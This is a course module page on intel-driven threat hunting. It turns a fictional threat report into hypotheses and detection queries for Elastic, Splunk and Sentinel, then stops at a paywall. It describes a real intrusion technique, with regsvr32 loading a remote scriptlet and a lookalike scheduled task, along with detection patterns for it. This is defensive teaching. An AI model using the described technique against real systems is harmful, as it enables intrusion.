Intel-driven threat hunting is where CTI pays off operationally. A threat report says “APT group X is using technique Y against sector Z” and, within hours, you are running queries against your environment to find whether you were hit. This module walks through a full cycle: from a fresh intel report to a hunt plan, queries, and findings β the capstone of the CTI track.
Hunting vs alerting β the distinction
- Alerting: known bad triggers automatically; SOC triages
- Hunting: analyst actively searches for unknown bad by hypothesis
Hunting fills the gap between “we have a signature for it” and “we haven’t heard about it yet.” Intel-driven hunts are fast β they have a specific hypothesis and bounded scope.
The hunt cycle
- Hypothesis β “If APT X is targeting us with technique Y, we would see pattern P in logs Q”
- Data check β do we have the logs needed? If not, hunt is blocked; note the gap
- Query β translate hypothesis into SIEM search; scope time window
- Triage β review results; identify true hits
- Enrich & correlate β for hits, pivot to related activity
- Conclude β hit found? Open incident. No hits? Document hypothesis as tested and move on
- Productionize β if the hunt logic is valuable and low-noise, convert to a detection rule
From an intel report to a hypothesis
Example intel snippet (fictional):
“Threat group TRITON-INDIA is targeting Indian SaaS firms since March 2026. Initial access via spearphishing with ISO attachments containing LNK β regsvr32 loading malicious SCT from attacker-controlled CDN. Post-exec: installs scheduled task named ‘GoogleUpdateTaskMachineCore’. C2 over HTTPS to *.cloudfront-proxied domains with User-Agent string ‘Mozilla/5.0 (compatible; MSIE 11.0)’.”
Extracted hypotheses:
- Spearphishing with ISO attachments β emails with .iso, .img, .vhd attachments from untrusted senders
- regsvr32 loading remote SCT β regsvr32 command lines with “scrobj.dll” and a URL
- Scheduled task with the Google-Update-lookalike name
- HTTPS traffic with the MSIE 11 User-Agent
Hunt query examples
In Elastic / Elasticsearch (KQL)
# Hypothesis 2 β regsvr32 remote SCT
process.name : "regsvr32.exe" and
process.command_line : (*scrobj.dll* and (*http://* or *https://*))
# Hypothesis 3 β scheduled task name
event.code : "4698" and
winlog.event_data.TaskName : "*GoogleUpdateTask*" and
not winlog.event_data.SubjectUserName : ("SYSTEM" or "LOCAL SERVICE")
# Hypothesis 4 β suspicious User-Agent
http.request.headers.user_agent.original :
"Mozilla/5.0 (compatible; MSIE 11.0)"
In Splunk (SPL)
index=sysmon EventCode=1 Image="*\\regsvr32.exe"
CommandLine="*scrobj.dll*" CommandLine="*://*"
index=email attachment_ext IN ("iso","img","vhd")
sender_address!="*@trusted-partner.com"
| stats count by sender_address, recipient, subject
In Sentinel (KQL)
DeviceProcessEvents
| where FileName =~ "regsvr32.exe"
| where ProcessCommandLine contains "scrobj.dll"
| where ProcessCommandLine has_any ("http://", "https://")
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
Triage discipline
Intel-driven hunts often produce 10-50 hits. You cannot investigate all; prioritise:
- Eliminate known-good patterns β your own software deployment processes, authorized scripts
- Sort by recency β fresh hits are more likely attacker-related than weeks-old
- Sort by unusualness β users or hosts that rarely show this behaviour
- Cross-reference the multiple hypotheses β a host with hits in hypothesis 2 AND 3 is much more likely than a host with one
After triage, 50 hits typically reduce to 2-5 “investigate further” candidates.
Pivoting on hits
For each high-priority hit, pivot:
π Intermediate Module Β· Basic Tier
Continue reading with Basic tier (βΉ499/month)
You've read 28% of this module. Unlock the remaining deep-dive, quiz, and every other Intermediate module.
99+ modulesAll levels up to this tier
20-question quizzesUnlimited retries with explanations
Completion certificatesShareable on LinkedIn
10 more sections locked below
